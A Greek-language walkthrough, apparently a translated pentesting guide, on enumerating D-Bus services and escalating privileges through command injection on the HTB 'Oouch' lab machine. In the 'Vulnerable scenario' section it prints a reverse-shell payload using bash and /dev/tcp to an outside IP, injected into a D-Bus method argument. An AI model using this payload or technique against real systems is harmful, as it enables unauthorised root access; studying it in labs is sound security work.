D-Bus Enumeration & Command Injection Privilege Escalation
Απαρίθμηση GUI
Το D-Bus χρησιμοποιείται ως μεσολαβητής επικοινωνίας μεταξύ διεργασιών (IPC) στα περιβάλλοντα εργασίας Ubuntu. Στο Ubuntu, παρατηρείται η ταυτόχρονη λειτουργία αρκετών διαύλων μηνυμάτων: ο διαύλος του συστήματος, που χρησιμοποιείται κυρίως από υπηρεσίες με προνόμια για την εκθεση υπηρεσιών που αφορούν σε όλο το σύστημα, και ένας διαύλος συνεδρίας για κάθε συνδεδεμένο χρήστη, που εκθέτει υπηρεσίες που αφορούν μόνο τον συγκεκριμένο χρήστη. Ο εστίαση εδώ είναι κυρίως στον διαύλο του συστήματος λόγω της συσχέτισής του με υπηρεσίες που λειτουργούν με υψηλά προνόμια (π.χ., root) καθώς ο στόχος μας είναι η ανύψωση προνομίων. Σημειώνεται ότι η αρχιτεκτονική του D-Bus χρησιμοποιεί έναν 'δρομολογητή' ανά διαύλο συνεδρίας, ο οποίος είναι υπεύθυνος για την ανακατεύθυνση των μηνυμάτων των πελατών στις κατάλληλες υπηρεσίες με βάση τη διεύθυνση που καθορίζεται από τους πελάτες για την υπηρεσία με την οποία επιθυμούν να επικοινωνήσουν.
Οι υπηρεσίες στο D-Bus ορίζονται από τα αντικείμενα και τις διεπαφές που εκθέτουν. Τα αντικείμενα μπορούν να μοιάζουν με παραδείγματα κλάσεων σε τυπικές γλώσσες ΟΟΠ, με κάθε παράδειγμα να αναγνωρίζεται μοναδικά από ένα μονοπάτι αντικειμένου. Αυτό το μονοπάτι, παρόμοιο με ένα μονοπάτι αρχείουσυστήματος, αναγνωρίζει μοναδικά κάθε αντικείμενο που εκθέτεται από την υπηρεσία. Μια βασική διεπαφή για ερευνητικούς σκοπούς είναι η διεπαφή org.freedesktop.DBus.Introspectable, που περιλαμβάνει ένα μόνο μέθοδο, το Introspect. Αυτή η μέθοδος επιστρέφει μια XML αναπαράσταση των υποστηριζόμενων μεθόδων του αντικειμένου, σημάτων και ιδιοτήτων, με εστίαση εδώ στις μεθόδους ενώ παραλείπονται οι ιδιότητες και τα σήματα.
Για την επικοινωνία με τη διεπαφή D-Bus, χρησιμοποιήθηκαν δύο εργαλεία: ένα εργαλείο γραμμής εντολών με το όνομα gdbus για εύκολη εκκίνηση των μεθόδων που εκθέτει το D-Bus σε σενάρια, και το D-Feet, ένα εργαλείο GUI βασισμένο σε Python σχεδιασμένο για την απαρίθμηση των υπηρεσιών που είναι διαθέσιμες σε κάθε διαύλο και για την εμφάνιση των αντικειμένων που περιέχονται σε κάθε υπηρεσία.
Στην πρώτη εικόνα εμφανίζονται υπηρεσίες που έχουν καταχωρηθεί με το σύστημα διαχείρισης D-Bus, με το org.debin.apt να είναι ειδικά επισημασμένο μετά την επιλογή του κουμπιού Συστημικό Λεωφορείο. Το D-Feet ερωτά αυτήν την υπηρεσία για αντικείμενα, εμφανίζοντας διεπαφές, μεθόδους, ιδιότητες και σήματα για τα επιλεγμένα αντικείμενα, όπως φαίνεται στη δεύτερη εικόνα. Λεπτομερείες δίνονται επίσης για την υπογραφή κάθε μεθόδου.
Ένα χαρακτηριστικό είναι η εμφάνιση του ID διεργασίας (pid) και της γραμμής εντολών, χρήσιμα για την επιβεβαίωση εάν η υπηρεσία τρέχει με αυξημένα δικαιώματα, σημαντικό για τη σχετικότητα της έρευνας.
Το D-Feet επίσης επιτρέπει την κλήση μεθόδων: οι χρήστες μπορούν να εισάγουν εκφράσεις Python ως παραμέτρους, οι οποίες το D-Feet μετατρέπει σε τύπους D-Bus πριν τις περάσει στην υπηρεσία.
Ωστόσο, να σημειωθεί ότι κάποιες μεθόδοι απαιτούν πιστοποίηση πριν μας επιτρέψουν να τις καλέσουμε. Θα αγνοήσουμε αυτές τις μεθόδους, αφού ο στόχος μας είναι να αναβαθμίσουμε τα δικαιώματά μας χωρίς διαπιστευτήρια από την αρχή.
Επίσης, να σημειωθεί ότι μερικές από τις υπηρεσίες ερωτούν μια άλλη υπηρεσία D-Bus με το όνομα org.freedeskto.PolicyKit1 εάν ένας χρήστης πρέπει να επιτραπεί να εκτελέσει συγκεκριμένες ενέργειες ή όχι.
Απαρίθμηση Εντολών Cmd line
Λίστα Αντικειμένων Υπηρεσίας
Είναι δυνατόν να απαριθμηθούν οι ανοιχτές διεπαφές D-Bus με:
Συνδέσεις
Από τη Wikipedia: Όταν ένας διεργασία δημιουργεί μια σύνδεση με ένα bus, το bus αναθέτει στη σύνδεση ένα ειδικό όνομα bus που ονομάζεται μοναδικό όνομα σύνδεσης. Τα ονόματα bus αυτού του τύπου είναι μεταβλητά - είναι εγγυημένο ότι δεν θα αλλάξουν όσο υπάρχει η σύνδεση - και, το σημαντικότερο, δεν μπορούν να επαναχρησιμοποιηθούν κατά τη διάρκεια της διάρκειας ζωής του bus. Αυτό σημαίνει ότι καμία άλλη σύνδεση σε αυτό το bus δεν θα έχει ποτέ ανατεθεί τέτοιο μοναδικό όνομα σύνδεσης, ακόμα και αν η ίδια διεργασία κλείσει τη σύνδεση με το bus και δημιουργήσει μια νέα. Τα μοναδικά ονόματα σύνδεσης είναι εύκολα αναγνωρίσιμα επειδή ξεκινούν με τον - διαφορετικά απαγορευμένο - χαρακτήρα άνω τελεία.
Πληροφορίες Αντικειμένου Υπηρεσίας
Στη συνέχεια, μπορείτε να λάβετε κάποιες πληροφορίες σχετικά με τη διεπαφή με:
Κατάλογος Διεπαφών ενός Αντικειμένου Υπηρεσίας
Χρειάζεστε επαρκή δικαιώματα.
Εξετάστε τη διεπαφή ενός αντικειμένου υπηρεσίας
Σημειώστε πώς σε αυτό το παράδειγμα επιλέχθηκε η πιο πρόσφατη διεπαφή που ανακαλύφθηκε χρησιμοποιώντας την παράμετρο tree
(δείτε την προηγούμενη ενότητα):
Παρακολούθηση/Καταγραφή Διεπαφής
Με επαρκή δικαιώματα (απλά τα δικαιώματα send_destination
και receive_sender
δεν είναι αρκετά) μπορείτε να παρακολουθήσετε μια επικοινωνία D-Bus.
Για να παρακολουθήσετε μια επικοινωνία θα πρέπει να είστε root. Αν αντιμετωπίζετε προβλήματα με το να γίνετε root, ελέγξτε https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/ και https://wiki.ubuntu.com/DebuggingDBus
Αν γνωρίζετε πως να ρυθμίσετε ένα αρχείο ρυθμίσεων D-Bus για επιτροπή σε μη root χρήστες να καταγράφουν την επικοινωνία, παρακαλώ επικοινωνήστε μαζί μου!
Διαφορετικοί τρόποι παρακολούθησης:
Στο παρακάτω παράδειγμα το interface htb.oouch.Block
παρακολουθείται και το μήνυμα "lalalalal" στέλνεται μέσω παρανόησης:
Μπορείτε να χρησιμοποιήσετε το capture
αντί για το monitor
για να αποθηκεύσετε τα αποτελέσματα σε ένα αρχείο pcap.
Φιλτράρισμα όλου του θορύβου
Αν υπάρχει υπερβολικά πολλή πληροφορία στο δίκτυο, περάστε έναν κανόνα ταιριάσματος όπως εξής:
Μπορούν να καθοριστούν πολλαπλοί κανόνες. Εάν ένα μήνυμα ταιριάζει με οποιονδήποτε από τους κανόνες, το μήνυμμα θα εκτυπωθεί. Όπως εδώ:
Δείτε την τεκμηρίωση του D-Bus για περισσότερες πληροφορίες σχετικά με τη σύνταξη των κανόνων ταιριάσματος.
Περισσότερα
Το busctl
έχει ακόμα περισσότερες επιλογές, βρείτε τις όλες εδώ.
Ευάλωτο Σενάριο
Ως χρήστης qtc μέσα στον υπολογιστή "oouch" από το HTB μπορείτε να βρείτε ένα αναπάντεχο αρχείο ρύθμισης D-Bus που βρίσκεται στο /etc/dbus-1/system.d/htb.oouch.Block.conf:
Σημείωση από την προηγούμενη διαμόρφωση ότι θα πρέπει να είστε ο χρήστης root
ή www-data
για να στείλετε και να λάβετε πληροφορίες μέσω αυτής της επικοινωνίας D-BUS.
Ως χρήστης qtc μέσα στο container docker aeb4525789d8 μπορείτε να βρείτε κάποιον κώδικα που σχετίζεται με το dbus στο αρχείο /code/oouch/routes.py. Αυτός είναι ο ενδιαφέρων κώδικας:
Όπως μπορείτε να δείτε, συνδέεται σε ένα διεπαφή D-Bus και στέλνει στη λειτουργία "Block" το "client_ip".
Απέναντι στη σύνδεση D-Bus υπάρχει ένας μεταγλωττισμένος δυαδικός κώδικας C που εκτελείται. Αυτός ο κώδικας ακούει στη σύνδεση D-Bus για διευθύνσεις IP και καλεί το iptables μέσω της λειτουργίας system
για να μπλοκάρει τη δοθείσα διεύθυνση IP.
Η κλήση στην system
είναι ευάλωτη εσκεμμένα σε εντολές εισβολής, έτσι ένα φορτίο όπως το παρακάτω θα δημιουργήσει ένα αντίστροφο κέλυφος: ;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #
Εκμεταλλευτείτε το
Στο τέλος αυτής της σελίδας μπορείτε να βρείτε τον πλήρη κώδικα C της εφαρμογής D-Bus. Μέσα σε αυτόν μπορείτε να βρείτε μεταξύ των γραμμών 91-97 πώς ο D-Bus object path
και το όνομα διεπαφής
εγγράφονται. Αυτές οι πληροφορίες θα είναι απαραίτητες για να στείλετε πληροφορίες στη σύνδεση D-Bus:
Επίσης, στη γραμμή 57 μπορείτε να βρείτε ότι η μοναδική μέθοδος που έχει καταχωρηθεί για αυτή την επικοινωνία D-Bus ονομάζεται Block
(Γι' αυτό στην επόμενη ενότητα τα φορτία δεδομένων θα σταλούν στο αντικείμενο υπηρεσίας htb.oouch.Block
, τη διεπαφή /htb/oouch/Block
και τη μέθοδο με όνομα Block
):
Python
Ο παρακάτω κώδικας Python θα στείλει το φορτίο στη σύνδεση D-Bus στη μέθοδο Block
μέσω block_iface.Block(runme)
(σημείωση ότι εξήχθη από το προηγούμενο τμήμα κώδικα):
busctl και dbus-send
Το
dbus-send
είναι ένα εργαλείο που χρησιμοποιείται για να στείλει μήνυμα στο "Message Bus".Message Bus - Ένα λογισμικό που χρησιμοποιείται από τα συστήματα για να διευκολύνει τις επικοινωνίες μεταξύ εφαρμογών. Σχετίζεται με την Ουρά Μηνυμάτων (τα μηνύματα είναι ταξινομημένα σε ακολουθία), αλλά στο Message Bus τα μηνύματα στέλνονται με ένα μοντέλο συνδρομής και είναι επίσης πολύ γρήγορα.
Η ετικέτα "-system" χρησιμοποιείται για να αναφέρει ότι πρόκειται για ένα μήνυμα συστήματος, όχι ένα μήνυμα συνεδρίας (από προεπιλογή).
Η ετικέτα "--print-reply" χρησιμοποιείται για να εκτυπώσει το μήνυμά μας κατάλληλα και να λαμβάνει οποιεσδήποτε απαντήσεις σε μορφή ευανάγνωστη από ανθρώπους.
Η εντολή "--dest=Dbus-Interface-Block" είναι η διεύθυνση της διεπαφής Dbus.
Η εντολή "--string:" - Τύπος μηνύματος που θέλουμε να στείλουμε στη διεπαφή. Υπάρχουν διάφορες μορφές αποστολής μηνυμάτων όπως διπλό, bytes, booleans, int, objpath. Από αυτά, το "object path" είναι χρήσιμο όταν θέλουμε να στείλουμε τη διαδρομή ενός αρχείου στη διεπαφή Dbus. Μπορούμε να χρησιμοποιήσουμε ένα ειδικό αρχείο (FIFO) σε αυτήν την περίπτωση για να περάσουμε ένα εντολή στη διεπαφή με το όνομα ενός αρχείου. "string:;" - Αυτό είναι για να καλέσουμε ξανά τη διαδρομή του αντικειμένου όπου τοποθετούμε το αρχείο αντιστροφής κέλυφους FIFO.
Σημειώστε ότι στο htb.oouch.Block.Block
, ο πρώτος μέρος (htb.oouch.Block
) αναφέρεται στο αντικείμενο υπηρεσίας και το τελευταίο μέρος (.Block
) αναφέρεται στο όνομα της μεθόδου.